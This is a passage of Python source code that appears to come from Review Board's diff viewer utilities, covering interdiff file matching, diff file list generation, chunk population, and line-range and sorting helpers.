return patch(diff=diff,\n orig_file=source_data,\n filename=filediff.dest_file,\n request=request)\n\n\ndef get_revision_str(revision):\n if revision == HEAD:\n return \"HEAD\"\n elif revision == PRE_CREATION:\n return \"\"\n else:\n return _(\"Revision %s\") % revision\n\n\ndef get_filenames_match_patterns(patterns, filenames):\n \"\"\"Return whether any of the filenames match any of the patterns.\n\n This is used to compare a list of filenames to a list of\n :py:mod:`patterns <fnmatch>`. The patterns are case-sensitive.\n\n Args:\n patterns (list of unicode):\n The list of patterns to match against.\n\n filename (list of unicode):\n The list of filenames.\n\n Returns:\n bool:\n ``True`` if any filenames match any patterns. ``False`` if none match.\n \"\"\"\n for pattern in patterns:\n for filename in filenames:\n if fnmatch.fnmatchcase(filename, pattern):\n return True\n\n return False\n\n\ndef get_filediff_encodings(filediff, encoding_list=None):\n \"\"\"Return a list of encodings to try for a FileDiff's source text.\n\n If the FileDiff already has a known encoding stored, then it will take\n priority. The provided encoding list, or the repository's list of\n configured encodingfs, will be provided as fallbacks.\n\n Args:\n filediff (reviewboard.diffviewer.models.filediff.FileDiff):\n The FileDiff to return encodings for.\n\n encoding_list (list of unicode, optional):\n An explicit list of encodings to try. 
If not provided, the\n repository's list of encodings will be used instead (which is\n generally preferred).\n\n Returns:\n list of unicode:\n The list of encodings to try for the source file.\n \"\"\"\n filediff_encoding = filediff.encoding\n encodings = []\n\n if encoding_list is None:\n encoding_list = filediff.get_repository().get_encoding_list()\n\n if filediff_encoding:\n encodings.append(filediff_encoding)\n encodings += [\n encoding\n for encoding in encoding_list\n if encoding != filediff_encoding\n ]\n else:\n encodings += encoding_list\n\n return encodings\n\n\ndef get_matched_interdiff_files(tool, filediffs, interfilediffs):\n \"\"\"Generate pairs of matched files for display in interdiffs.\n\n This compares a list of filediffs and a list of interfilediffs, attempting\n to best match up the files in both for display in the diff viewer.\n\n This will prioritize matches that share a common source filename,\n destination filename, and new/deleted state. Failing that, matches that\n share a common source filename are paired off.\n\n Any entries in ``interfilediffs` that don't have any match in ``filediffs``\n are considered new changes in the interdiff, and any entries in\n ``filediffs`` that don't have entries in ``interfilediffs`` are considered\n reverted changes.\n\n Args:\n tool (reviewboard.scmtools.core.SCMTool)\n The tool used for all these diffs.\n\n filediffs (list of reviewboard.diffviewer.models.filediff.FileDiff):\n The list of filediffs on the left-hand side of the diff range.\n\n interfilediffs (list of reviewboard.diffviewer.models.filediff.\n FileDiff):\n The list of filediffs on the right-hand side of the diff range.\n\n Yields:\n tuple:\n A paired off filediff match. This is a tuple containing two entries,\n each a :py:class:`~reviewboard.diffviewer.models.filediff.FileDiff` or\n ``None``.\n \"\"\"\n parser = tool.get_parser(b'')\n _normfile = parser.normalize_diff_filename\n\n def _make_detail_key(filediff):\n return (_normfile(filediff.source_file),\n _normfile(filediff.dest_file),\n filediff.is_new,\n filediff.deleted)\n\n # In order to support interdiffs properly, we need to display diffs on\n # every file in the union of both diffsets. Iterating over one diffset\n # or the other doesn't suffice. We also need to be careful to handle\n # things like renamed/moved files, particularly when there are multiple\n # of them with the same source filename.\n #\n # This is done in four stages:\n #\n # 1. Build up maps and a set for keeping track of possible\n # interfilediff candidates for future stages.\n #\n # 2. Look for any files that are common between the two diff revisions\n # that have the same source filename, same destination filename, and\n # the same new/deleted states.\n #\n # Unless a diff is hand-crafted, there should never be more than one\n # match here.\n #\n # 3. Look for any files that are common between the two diff revisions\n # that have the same source filename and new/deleted state. These will\n # ignore the destination filename, helping to match cases where diff 1\n # modifies a file and diff 2 modifies + renames/moves it.\n #\n # 4. 
Add any remaining files from diff 2 that weren't found in diff 1.\n #\n # We don't have to worry about things like the order of matched diffs.\n # That will be taken care of at the end of the function.\n detail_interdiff_map = {}\n simple_interdiff_map = {}\n remaining_interfilediffs = set()\n\n # Stage 1: Build up the maps/set of interfilediffs.\n for interfilediff in interfilediffs:\n source_file = _normfile(interfilediff.source_file)\n detail_key = _make_detail_key(interfilediff)\n\n # We'll store this interfilediff in three spots: The set of\n # all interfilediffs, the detail map (for source + dest +\n # is_new file comparisons), and the simple map (for direct\n # source_file comparisons). These will be used for the\n # different matching stages.\n remaining_interfilediffs.add(interfilediff)\n detail_interdiff_map[detail_key] = interfilediff\n simple_interdiff_map.setdefault(source_file, set()).add(interfilediff)\n\n # Stage 2: Look for common files with the same source/destination\n # filenames and new/deleted states.\n #\n # There will only be one match per filediff, at most. Any filediff or\n # interfilediff that we find will be excluded from future stages.\n remaining_filediffs = []\n\n for filediff in filediffs:\n source_file = _normfile(filediff.source_file)\n\n try:\n interfilediff = detail_interdiff_map.pop(\n _make_detail_key(filediff))\n except KeyError:\n remaining_filediffs.append(filediff)\n continue\n\n yield filediff, interfilediff\n\n if interfilediff:\n remaining_interfilediffs.discard(interfilediff)\n\n try:\n simple_interdiff_map.get(source_file, []).remove(interfilediff)\n except ValueError:\n pass\n\n # Stage 3: Look for common files with the same source/destination\n # filenames (when they differ).\n #\n # Any filediff from diff 1 not already processed in stage 2 will be\n # processed here. We'll look for any filediffs from diff 2 that were\n # moved/copied from the same source to the same destination. This is one\n # half of the detailed file state we checked in stage 2.\n new_remaining_filediffs = []\n\n for filediff in remaining_filediffs:\n source_file = _normfile(filediff.source_file)\n found_interfilediffs = [\n temp_interfilediff\n for temp_interfilediff in simple_interdiff_map.get(source_file, [])\n if (temp_interfilediff.dest_file == filediff.dest_file and\n filediff.source_file != filediff.dest_file)\n ]\n\n if found_interfilediffs:\n remaining_interfilediffs.difference_update(found_interfilediffs)\n\n for interfilediff in found_interfilediffs:\n simple_interdiff_map[source_file].remove(interfilediff)\n yield filediff, interfilediff\n else:\n new_remaining_filediffs.append(filediff)\n\n remaining_filediffs = new_remaining_filediffs\n\n # Stage 4: Look for common files with the same source filenames and\n # new/deleted states.\n #\n # Any filediff from diff 1 not already processed in stage 3 will be\n # processed here. We'll look for any filediffs from diff 2 that match\n # the source filename and the new/deleted state. 
Any that we find will\n # be matched up.\n new_remaining_filediffs = []\n\n for filediff in remaining_filediffs:\n source_file = _normfile(filediff.source_file)\n found_interfilediffs = [\n temp_interfilediff\n for temp_interfilediff in simple_interdiff_map.get(source_file, [])\n if (temp_interfilediff.is_new == filediff.is_new and\n temp_interfilediff.deleted == filediff.deleted)\n ]\n\n if found_interfilediffs:\n remaining_interfilediffs.difference_update(found_interfilediffs)\n\n for interfilediff in found_interfilediffs:\n simple_interdiff_map[source_file].remove(interfilediff)\n yield filediff, interfilediff\n else:\n new_remaining_filediffs.append(filediff)\n\n remaining_filediffs = new_remaining_filediffs\n\n # Stage 5: Look for common files with the same source filenames and\n # compatible new/deleted states.\n #\n # This will help catch files that were marked as new in diff 1 but not in\n # diff 2, or deleted in diff 2 but not in diff 1. (The inverse for either\n # is NOT matched!). This is important because if a file is introduced in a\n # parent diff, the file can end up showing up as new itself (which is a\n # separate bug).\n #\n # Even if that bug did not exist, it's still possible for a file to be new\n # in one revision but committed separately (by that user or another), so we\n # need these matched.\n #\n # Any files not found with a matching interdiff will simply be yielded.\n # This is the last stage dealing with the filediffs in the first revision.\n for filediff in remaining_filediffs:\n source_file = _normfile(filediff.source_file)\n found_interfilediffs = [\n temp_interfilediff\n for temp_interfilediff in simple_interdiff_map.get(source_file, [])\n if (((filediff.is_new or not temp_interfilediff.is_new) or\n (not filediff.is_new and temp_interfilediff.is_new and\n filediff.dest_detail == temp_interfilediff.dest_detail)) and\n (not filediff.deleted or temp_interfilediff.deleted))\n ]\n\n if found_interfilediffs:\n remaining_interfilediffs.difference_update(found_interfilediffs)\n\n for interfilediff in found_interfilediffs:\n # NOTE: If more stages are ever added that deal with\n # simple_interdiff_map, then we'll need to remove\n # interfilediff from that map here.\n yield filediff, interfilediff\n else:\n yield filediff, None\n\n # Stage 6: Add any remaining files from the interdiff.\n #\n # We've removed everything that we've already found. What's left are\n # interdiff files that are new. They have no file to diff against.\n #\n # The end result is going to be a view that's the same as when you're\n # viewing a standard diff. As such, we can pretend the interdiff is\n # the source filediff and not specify an interdiff. Keeps things\n # simple, code-wise, since we really have no need to special-case\n # this.\n for interfilediff in remaining_interfilediffs:\n yield None, interfilediff\n\n\ndef get_filediffs_match(filediff1, filediff2):\n \"\"\"Return whether two FileDiffs effectively match.\n\n This is primarily checking that the patched version of two files are going\n to be basically the same.\n\n This will first check that we even have both FileDiffs. Assuming we have\n both, this will check the diff for equality. If not equal, we at least\n check that both files were deleted (which is equivalent to being equal).\n\n The patched SHAs are then checked. These would be generated as part of the\n diff viewing process, so may not be available. 
We prioritize the SHA256\n hashes (introduced in Review Board 4.0), and fall back on SHA1 hashes if\n not present.\n\n Args:\n filediff1 (reviewboard.diffviewer.models.filediff.FileDiff):\n The first FileDiff to compare.\n\n filediff2 (reviewboard.diffviewer.models.filediff.FileDiff):\n The second FileDiff to compare.\n\n Returns:\n bool:\n ``True`` if both FileDiffs effectively match. ``False`` if they do\n not.\n\n Raises:\n ValueError:\n ``None`` was provided for both ``filediff1`` and ``filediff2``.\n \"\"\"\n if filediff1 is None and filediff2 is None:\n raise ValueError('filediff1 and filediff2 cannot both be None')\n\n # For the hash comparisons, there's a chance we won't have any SHA1 (RB\n # 2.0+) or SHA256 (RB 4.0+) hashes, so we have to check for them. We want\n # to prioritize SHA256 hashes, but if the filediff or interfilediff lacks\n # a SHA256 hash, we want to fall back to SHA1.\n return (filediff1 is not None and filediff2 is not None and\n (filediff1.diff == filediff2.diff or\n (filediff1.deleted and filediff2.deleted) or\n (filediff1.patched_sha256 is not None and\n filediff1.patched_sha256 == filediff2.patched_sha256) or\n ((filediff1.patched_sha256 is None or\n filediff2.patched_sha256 is None) and\n filediff1.patched_sha1 is not None and\n filediff1.patched_sha1 == filediff2.patched_sha1)))\n\n\ndef get_diff_files(diffset, filediff=None, interdiffset=None,\n interfilediff=None, base_filediff=None, request=None,\n filename_patterns=None, base_commit=None, tip_commit=None):\n \"\"\"Return a list of files that will be displayed in a diff.\n\n This will go through the given diffset/interdiffset, or a given filediff\n within that diffset, and generate the list of files that will be\n displayed. This file list will contain a bunch of metadata on the files,\n such as the index, original/modified names, revisions, associated\n filediffs/diffsets, and so on.\n\n This can be used along with :py:func:`populate_diff_chunks` to build a full\n list containing all diff chunks used for rendering a side-by-side diff.\n\n Args:\n diffset (reviewboard.diffviewer.models.diffset.DiffSet):\n The diffset containing the files to return.\n\n filediff (reviewboard.diffviewer.models.filediff.FileDiff, optional):\n A specific file in the diff to return information for.\n\n interdiffset (reviewboard.diffviewer.models.diffset.DiffSet, optional):\n A second diffset used for an interdiff range.\n\n interfilediff (reviewboard.diffviewer.models.filediff.FileDiff,\n optional):\n A second specific file in ``interdiffset`` used to return\n information for. This should be provided if ``filediff`` and\n ``interdiffset`` are both provided. If it's ``None`` in this\n case, then the diff will be shown as reverted for this file.\n\n This may not be provided if ``base_filediff`` is provided.\n\n base_filediff (reviewbaord.diffviewer.models.filediff.FileDiff,\n optional):\n The base FileDiff to use.\n\n This may only be provided if ``filediff`` is provided and\n ``interfilediff`` is not.\n\n filename_patterns (list of unicode, optional):\n A list of filenames or :py:mod:`patterns <fnmatch>` used to\n limit the results. Each of these will be matched against the\n original and modified file of diffs and interdiffs.\n\n base_commit (reviewboard.diffviewer.models.diffcommit.DiffCommit,\n optional):\n An optional base commit. 
No :py:class:`FileDiffs\n <reviewboard.diffviewer.models.filediff.FileDiff>` from commits\n before that commit will be included in the results.\n\n This argument only applies to :py:class:`DiffSets\n <reviewboard.diffviewer.models.diffset.DiffSet>` with\n :py:class:`DiffCommits <reviewboard.diffviewer.models.diffcommit\n .DiffCommit>`.\n\n tip_commit (reviewboard.diffviewer.models.diffcommit.DiffSet,\n optional):\n An optional tip commit. No :py:class:`FileDiffs\n <reviewboard.diffviewer.models.filediff.FileDiff>` from commits\n after that commit will be included in the results.\n\n This argument only applies to :py:class:`DiffSets\n <reviewboard.diffviewer.models.diffset.DiffSet>` with\n :py:class:`DiffCommits <reviewboard.diffviewer.models.diffcommit\n .DiffCommit>`.\n\n Returns:\n list of dict:\n A list of dictionaries containing information on the files to show\n in the diff, in the order in which they would be shown.\n \"\"\"\n # It is presently not supported to do an interdiff with commit spans. It\n # would require base/tip commits for the interdiffset as well.\n assert not interdiffset or (base_commit is None and tip_commit is None)\n assert base_filediff is None or interfilediff is None\n\n if (diffset.commit_count > 0 and\n base_commit and\n tip_commit and\n base_commit.pk > tip_commit.pk):\n # If the base commit is more recent than the tip commit the interval\n # **must** be empty.\n return []\n\n per_commit_filediffs = None\n requested_base_filediff = base_filediff\n\n if filediff:\n filediffs = [filediff]\n\n if interdiffset:\n log_timer = log_timed(\"Generating diff file info for \"\n \"interdiffset ids %s-%s, filediff %s\" %\n (diffset.id, interdiffset.id, filediff.id),\n request=request)\n else:\n log_timer = log_timed(\"Generating diff file info for \"\n \"diffset id %s, filediff %s\" %\n (diffset.id, filediff.id),\n request=request)\n\n if (diffset.commit_count > 0 and\n ((base_commit and filediff.commit_id <= base_commit.pk) or\n (tip_commit and filediff.commit_id > tip_commit.pk))):\n # The requested FileDiff is outside the requested commit range.\n return []\n else:\n if (diffset.commit_count > 0 and\n (base_commit is not None or tip_commit is not None)):\n # Even if we have base_commit, we need to query for all FileDiffs\n # so that we can do ancestor computations.\n filediffs = per_commit_filediffs = diffset.per_commit_files\n\n if base_commit:\n base_commit_id = base_commit.pk\n else:\n base_commit_id = 0\n\n if tip_commit:\n tip_commit_id = tip_commit.pk\n else:\n tip_commit_id = None\n\n filediffs = [\n f\n for f in filediffs\n if (f.commit_id > base_commit_id and\n (not tip_commit_id or\n f.commit_id <= tip_commit_id))\n ]\n\n filediffs = exclude_ancestor_filediffs(filediffs,\n per_commit_filediffs)\n else:\n filediffs = diffset.cumulative_files\n\n if interdiffset:\n log_timer = log_timed(\"Generating diff file info for \"\n \"interdiffset ids %s-%s\" %\n (diffset.id, interdiffset.id),\n request=request)\n else:\n log_timer = log_timed(\"Generating diff file info for \"\n \"diffset id %s\" % diffset.id,\n request=request)\n\n # Filediffs that were created with leading slashes stripped won't match\n # those created with them present, so we need to compare them without in\n # order for the filenames to match up properly.\n tool = diffset.repository.get_scmtool()\n\n if interdiffset:\n if not filediff:\n if interdiffset.commit_count > 0:\n # Currently, only interdiffing between cumulative diffs is\n # supported.\n interfilediffs = interdiffset.cumulative_files\n 
else:\n interfilediffs = list(interdiffset.files.all())\n\n elif interfilediff:\n interfilediffs = [interfilediff]\n else:\n interfilediffs = []\n\n filediff_parts = []\n matched_filediffs = get_matched_interdiff_files(\n tool=tool,\n filediffs=filediffs,\n interfilediffs=interfilediffs)\n\n for temp_filediff, temp_interfilediff in matched_filediffs:\n if temp_filediff:\n filediff_parts.append((temp_filediff, temp_interfilediff,\n True))\n elif temp_interfilediff:\n filediff_parts.append((temp_interfilediff, None, False))\n else:\n logging.error(\n 'get_matched_interdiff_files returned an entry with an '\n 'empty filediff and interfilediff for diffset=%r, '\n 'interdiffset=%r, filediffs=%r, interfilediffs=%r',\n diffset, interdiffset, filediffs, interfilediffs)\n\n raise ValueError(\n 'Internal error: get_matched_interdiff_files returned an '\n 'entry with an empty filediff and interfilediff! Please '\n 'report this along with information from the server '\n 'error log.')\n else:\n # We're not working with interdiffs. We can easily create the\n # filediff_parts directly.\n filediff_parts = [\n (temp_filediff, None, False)\n for temp_filediff in filediffs\n ]\n\n # Now that we have all the bits and pieces we care about for the filediffs,\n # we can start building information about each entry on the diff viewer.\n files = []\n\n for parts in filediff_parts:\n filediff, interfilediff, force_interdiff = parts\n\n newfile = filediff.is_new\n\n if interdiffset:\n # First, find out if we want to even process this one.\n # If the diffs are identical, or the patched files are identical,\n # or if the files were deleted in both cases, then we can be\n # absolutely sure that there's nothing interesting to show to\n # the user.\n if get_filediffs_match(filediff, interfilediff):\n continue\n\n source_revision = _('Diff Revision %s') % diffset.revision\n else:\n source_revision = get_revision_str(filediff.source_revision)\n\n if interfilediff:\n dest_revision = _('Diff Revision %s') % interdiffset.revision\n else:\n if force_interdiff:\n dest_revision = (_('Diff Revision %s - File Reverted') %\n interdiffset.revision)\n elif newfile:\n dest_revision = _('New File')\n else:\n dest_revision = _('New Change')\n\n if interfilediff:\n raw_depot_filename = filediff.dest_file\n raw_dest_filename = interfilediff.dest_file\n else:\n raw_depot_filename = filediff.source_file\n raw_dest_filename = filediff.dest_file\n\n depot_filename = tool.normalize_path_for_display(raw_depot_filename)\n dest_filename = tool.normalize_path_for_display(raw_dest_filename)\n\n if filename_patterns:\n if dest_filename == depot_filename:\n filenames = [dest_filename]\n else:\n filenames = [dest_filename, depot_filename]\n\n if not get_filenames_match_patterns(patterns=filename_patterns,\n filenames=filenames):\n continue\n\n base_filediff = None\n\n if filediff.commit_id:\n # If we pre-computed this above (or before) and we have all\n # FileDiffs, this will cost no additional queries.\n #\n # Otherwise this will cost up to\n # ``1 + len(diffset.per_commit_files.count())`` queries.\n ancestors = filediff.get_ancestors(minimal=False,\n filediffs=per_commit_filediffs)\n\n if ancestors:\n if requested_base_filediff:\n assert len(filediffs) == 1\n\n if requested_base_filediff in ancestors:\n base_filediff = requested_base_filediff\n else:\n raise ValueError(\n 'Invalid base_filediff (ID %d) for filediff (ID '\n '%d)'\n % (requested_base_filediff.pk, filediff.pk))\n elif base_commit:\n base_filediff = filediff.get_base_filediff(\n 
base_commit=base_commit,\n ancestors=ancestors)\n\n f = {\n 'depot_filename': depot_filename,\n 'dest_filename': dest_filename or depot_filename,\n 'revision': source_revision,\n 'dest_revision': dest_revision,\n 'filediff': filediff,\n 'interfilediff': interfilediff,\n 'force_interdiff': force_interdiff,\n 'binary': filediff.binary,\n 'deleted': filediff.deleted,\n 'moved': filediff.moved,\n 'copied': filediff.copied,\n 'moved_or_copied': filediff.moved or filediff.copied,\n 'newfile': newfile,\n 'is_symlink': filediff.extra_data.get('is_symlink', False),\n 'index': len(files),\n 'chunks_loaded': False,\n 'is_new_file': (\n (newfile or\n (base_filediff is not None and\n base_filediff.is_new)) and\n not interfilediff and\n not filediff.parent_diff\n ),\n 'base_filediff': base_filediff,\n }\n\n # When displaying an interdiff, we do not want to display the\n # revision of the base filediff. Instead, we will display the diff\n # revision as computed above.\n if base_filediff and not interdiffset:\n f['revision'] = get_revision_str(base_filediff.source_revision)\n f['depot_filename'] = tool.normalize_path_for_display(\n base_filediff.source_file)\n\n if force_interdiff:\n f['force_interdiff_revision'] = interdiffset.revision\n\n files.append(f)\n\n log_timer.done()\n\n if len(files) == 1:\n return files\n else:\n return get_sorted_filediffs(\n files,\n key=lambda f: f['interfilediff'] or f['filediff'])\n\n\ndef populate_diff_chunks(files, enable_syntax_highlighting=True,\n request=None):\n \"\"\"Populates a list of diff files with chunk data.\n\n This accepts a list of files (generated by get_diff_files) and generates\n diff chunk data for each file in the list. The chunk data is stored in\n the file state.\n \"\"\"\n from reviewboard.diffviewer.chunk_generator import get_diff_chunk_generator\n\n for diff_file in files:\n generator = get_diff_chunk_generator(\n request,\n diff_file['filediff'],\n diff_file['interfilediff'],\n diff_file['force_interdiff'],\n enable_syntax_highlighting,\n base_filediff=diff_file.get('base_filediff'))\n chunks = list(generator.get_chunks())\n\n diff_file.update({\n 'chunks': chunks,\n 'num_chunks': len(chunks),\n 'changed_chunk_indexes': [],\n 'whitespace_only': len(chunks) > 0,\n })\n\n for j, chunk in enumerate(chunks):\n chunk['index'] = j\n\n if chunk['change'] != 'equal':\n diff_file['changed_chunk_indexes'].append(j)\n meta = chunk.get('meta', {})\n\n if not meta.get('whitespace_chunk', False):\n diff_file['whitespace_only'] = False\n\n diff_file.update({\n 'num_changes': len(diff_file['changed_chunk_indexes']),\n 'chunks_loaded': True,\n })\n\n\ndef get_file_from_filediff(context, filediff, interfilediff):\n \"\"\"Return the files that corresponds to the filediff/interfilediff.\n\n This is primarily intended for use with templates. 
It takes a\n RequestContext for looking up the user and for caching file lists,\n in order to improve performance and reduce lookup times for files that have\n already been fetched.\n\n This function returns either exactly one file or ``None``.\n \"\"\"\n interdiffset = None\n\n key = \"_diff_files_%s_%s\" % (filediff.diffset.id, filediff.id)\n\n if interfilediff:\n key += \"_%s\" % (interfilediff.id)\n interdiffset = interfilediff.diffset\n\n if key in context:\n files = context[key]\n else:\n assert 'user' in context\n\n request = context.get('request', None)\n files = get_diff_files(filediff.diffset, filediff, interdiffset,\n interfilediff=interfilediff,\n request=request)\n populate_diff_chunks(files, get_enable_highlighting(context['user']),\n request=request)\n context[key] = files\n\n if not files:\n return None\n\n assert len(files) == 1\n return files[0]\n\n\ndef get_last_line_number_in_diff(context, filediff, interfilediff):\n \"\"\"Determine the last virtual line number in the filediff/interfilediff.\n\n This returns the virtual line number to be used in expandable diff\n fragments.\n \"\"\"\n f = get_file_from_filediff(context, filediff, interfilediff)\n\n last_chunk = f['chunks'][-1]\n last_line = last_chunk['lines'][-1]\n\n return last_line[0]\n\n\ndef _get_last_header_in_chunks_before_line(chunks, target_line):\n \"\"\"Find the last header in the list of chunks before the target line.\"\"\"\n def find_last_line_numbers(lines):\n \"\"\"Return a tuple of the last line numbers in the given list of lines.\n\n The last line numbers are not always contained in the last element of\n the ``lines`` list. This is the case when dealing with interdiffs that\n have filtered out opcodes.\n\n See :py:func:`get_chunks_in_range` for a description of what is\n contained in each element of ``lines``.\n \"\"\"\n last_left = None\n last_right = None\n\n for line in reversed(lines):\n if not last_right and line[4]:\n last_right = line[4]\n\n if not last_left and line[1]:\n last_left = line[1]\n\n if last_left and last_right:\n break\n\n return last_left, last_right\n\n def find_header(headers, offset, last_line):\n \"\"\"Return the last header that occurs before a line.\n\n The offset parameter is the difference between the virtual number and\n and actual line number in the chunk. This is required because the\n header line numbers are original or patched line numbers, not virtual\n line numbers.\n \"\"\"\n # In the case of interdiffs, it is possible that there will be headers\n # in the chunk that don't belong to it, but were put there due to\n # chunks being merged together. 
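# Illustrative sketch (not part of the original module): the typical pairing
# of get_diff_files() and populate_diff_chunks() described in their
# docstrings earlier in this file. ``diffset`` and ``request`` are assumed to
# be supplied by the caller (for example, a view); they are not defined here.
def _demo_build_diff_file_list(diffset, request=None):
    files = get_diff_files(diffset, request=request)

    # Chunk data is generated lazily; this fills in 'chunks', 'num_chunks',
    # 'changed_chunk_indexes' and related keys on each file entry.
    populate_diff_chunks(files, enable_syntax_highlighting=True,
                         request=request)

    return files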
We must therefore ensure that the\n # header we're looking at is actually in the chunk.\n end_line = min(last_line, target_line)\n\n for header in reversed(headers):\n virtual_line = header[0] + offset\n\n if virtual_line < end_line:\n return {\n 'line': virtual_line,\n 'text': header[1]\n }\n\n # The most up-to-date header information\n header = {\n 'left': None,\n 'right': None\n }\n\n for chunk in chunks:\n lines = chunk['lines']\n virtual_first_line = lines[0][0]\n\n if virtual_first_line <= target_line:\n if virtual_first_line == target_line:\n # The given line number is the first line of a new chunk so\n # there can't be any relevant header information here.\n break\n\n last_left, last_right = find_last_line_numbers(lines)\n\n if 'left_headers' in chunk['meta'] and lines[0][1]:\n offset = virtual_first_line - lines[0][1]\n\n left_header = find_header(chunk['meta']['left_headers'],\n offset, last_left + offset)\n\n header['left'] = left_header or header['left']\n\n if 'right_headers' in chunk['meta'] and lines[0][4]:\n offset = virtual_first_line - lines[0][4]\n\n right_header = find_header(chunk['meta']['right_headers'],\n offset, last_right + offset)\n\n header['right'] = right_header or header['right']\n else:\n # We've gone past the given line number.\n break\n\n return header\n\n\ndef get_last_header_before_line(context, filediff, interfilediff, target_line):\n \"\"\"Get the last header that occurs before the given line.\n\n This returns a dictionary of ``left`` header and ``right`` header. Each\n header is either ``None`` or a dictionary with the following fields:\n\n ======== ==============================================================\n Field Description\n ======== ==============================================================\n ``line`` Virtual line number (union of the original and patched files)\n ``text`` The header text\n ======== ==============================================================\n \"\"\"\n f = get_file_from_filediff(context, filediff, interfilediff)\n\n return _get_last_header_in_chunks_before_line(f['chunks'], target_line)\n\n\ndef get_file_chunks_in_range(context, filediff, interfilediff,\n first_line, num_lines):\n \"\"\"Generate the chunks within a range of lines in the specified filediff.\n\n This is primarily intended for use with templates. 
It takes a\n RequestContext for looking up the user and for caching file lists,\n in order to improve performance and reduce lookup times for files that have\n already been fetched.\n\n See :py:func:`get_chunks_in_range` for information on the returned state\n of the chunks.\n \"\"\"\n f = get_file_from_filediff(context, filediff, interfilediff)\n\n if f:\n return get_chunks_in_range(f['chunks'], first_line, num_lines)\n else:\n return []\n\n\ndef get_chunks_in_range(chunks, first_line, num_lines):\n \"\"\"Generate the chunks within a range of lines of a larger list of chunks.\n\n This takes a list of chunks, computes a subset of those chunks from the\n line ranges provided, and generates a new set of those chunks.\n\n Each returned chunk is a dictionary with the following fields:\n\n ============= ========================================================\n Variable Description\n ============= ========================================================\n ``change`` The change type (\"equal\", \"replace\", \"insert\", \"delete\")\n ``numlines`` The number of lines in the chunk.\n ``lines`` The list of lines in the chunk.\n ``meta`` A dictionary containing metadata on the chunk\n ============= ========================================================\n\n\n Each line in the list of lines is an array with the following data:\n\n ======== =============================================================\n Index Description\n ======== =============================================================\n 0 Virtual line number (union of the original and patched files)\n 1 Real line number in the original file\n 2 HTML markup of the original file\n 3 Changed regions of the original line (for \"replace\" chunks)\n 4 Real line number in the patched file\n 5 HTML markup of the patched file\n 6 Changed regions of the patched line (for \"replace\" chunks)\n 7 True if line consists of only whitespace changes\n ======== =============================================================\n \"\"\"\n for i, chunk in enumerate(chunks):\n lines = chunk['lines']\n\n if lines[-1][0] >= first_line >= lines[0][0]:\n start_index = first_line - lines[0][0]\n\n if first_line + num_lines <= lines[-1][0]:\n last_index = start_index + num_lines\n else:\n last_index = len(lines)\n\n new_chunk = {\n 'index': i,\n 'lines': chunk['lines'][start_index:last_index],\n 'numlines': last_index - start_index,\n 'change': chunk['change'],\n 'meta': chunk.get('meta', {}),\n }\n\n yield new_chunk\n\n first_line += new_chunk['numlines']\n num_lines -= new_chunk['numlines']\n\n assert num_lines >= 0\n if num_lines == 0:\n break\n\n\ndef get_enable_highlighting(user):\n user_syntax_highlighting = True\n\n if user.is_authenticated():\n try:\n profile = user.get_profile()\n user_syntax_highlighting = profile.syntax_highlighting\n except ObjectDoesNotExist:\n pass\n\n siteconfig = SiteConfiguration.objects.get_current()\n return (siteconfig.get('diffviewer_syntax_highlighting') and\n user_syntax_highlighting)\n\n\ndef get_line_changed_regions(oldline, newline):\n \"\"\"Returns regions of changes between two similar lines.\"\"\"\n if oldline is None or newline is None:\n return None, None\n\n # Use the SequenceMatcher directly. It seems to give us better results\n # for this. 
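# Illustrative sketch (not part of the original module): slicing a toy chunk
# with get_chunks_in_range(), using the 8-element line format documented
# above. The data below is made up purely for demonstration.
def _demo_chunks_in_range():
    toy_chunks = [{
        'change': 'equal',
        'numlines': 3,
        'meta': {},
        'lines': [
            # [vline, orig line, orig HTML, orig regions,
            #  patched line, patched HTML, patched regions, whitespace only]
            [1, 1, 'a', None, 1, 'a', None, False],
            [2, 2, 'b', None, 2, 'b', None, False],
            [3, 3, 'c', None, 3, 'c', None, False],
        ],
    }]

    # Requesting 2 lines starting at virtual line 2 yields a single trimmed
    # chunk whose 'numlines' is 2.
    return list(get_chunks_in_range(toy_chunks, first_line=2, num_lines=2))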
We should investigate steps to move to the new differ.\n differ = SequenceMatcher(None, oldline, newline)\n\n # This thresholds our results -- we don't want to show inter-line diffs\n # if most of the line has changed, unless those lines are very short.\n\n # FIXME: just a plain, linear threshold is pretty crummy here. Short\n # changes in a short line get lost. I haven't yet thought of a fancy\n # nonlinear test.\n if differ.ratio() < 0.6:\n return None, None\n\n oldchanges = []\n newchanges = []\n back = (0, 0)\n\n for tag, i1, i2, j1, j2 in differ.get_opcodes():\n if tag == 'equal':\n if (i2 - i1 < 3) or (j2 - j1 < 3):\n back = (j2 - j1, i2 - i1)\n\n continue\n\n oldstart, oldend = i1 - back[0], i2\n newstart, newend = j1 - back[1], j2\n\n if oldchanges and oldstart <= oldchanges[-1][1] < oldend:\n oldchanges[-1] = (oldchanges[-1][0], oldend)\n elif not oldline[oldstart:oldend].isspace():\n oldchanges.append((oldstart, oldend))\n\n if newchanges and newstart <= newchanges[-1][1] < newend:\n newchanges[-1] = (newchanges[-1][0], newend)\n elif not newline[newstart:newend].isspace():\n newchanges.append((newstart, newend))\n\n back = (0, 0)\n\n return oldchanges, newchanges\n\n\ndef get_sorted_filediffs(filediffs, key=None):\n \"\"\"Sorts a list of filediffs.\n\n The list of filediffs will be sorted first by their base paths in\n ascending order.\n\n Within a base path, they'll be sorted by base name (minus the extension)\n in ascending order.\n\n If two files have the same base path and base name, we'll sort by the\n extension in descending order. This will make :file:`*.h` sort ahead of\n :file:`*.c`/:file:`*.cpp`, for example.\n\n If the list being passed in is actually not a list of FileDiffs, it\n must provide a callable ``key`` parameter that will return a FileDiff\n for the given entry in the list. This will only be called once per\n item.\n \"\"\"\n def cmp_filediffs(filediff1, filediff2):\n x = make_key(filediff1)\n y = make_key(filediff2)\n\n # Sort based on basepath in ascending order.\n if x[0] != y[0]:\n a = x[0]\n b = y[0]\n else:\n # Sort based on filename in ascending order, then based on\n # the extension in descending order, to make *.h sort ahead of\n # *.c/cpp.\n x_file, x_ext = os.path.splitext(x[1])\n y_file, y_ext = os.path.splitext(y[1])\n\n if x_file == y_file:\n a = y_ext\n b = x_ext\n else:\n a = x_file\n b = y_file\n\n return cmp(a, b)\n\n def make_key(filediff):\n if key:\n filediff = key(filediff)\n\n filename = filediff.dest_file\n i = filename.rfind('/')\n\n if i == -1:\n return '', filename\n else:\n return filename[:i], filename[i + 1:]\n\n return sorted(filediffs, key=cmp_to_key(cmp_filediffs))\n\n\ndef get_displayed_diff_line_ranges(chunks, first_vlinenum, last_vlinenum):\n \"\"\"Return the displayed line ranges based on virtual line numbers.\n\n This takes the virtual line numbers (the index in the side-by-side diff\n 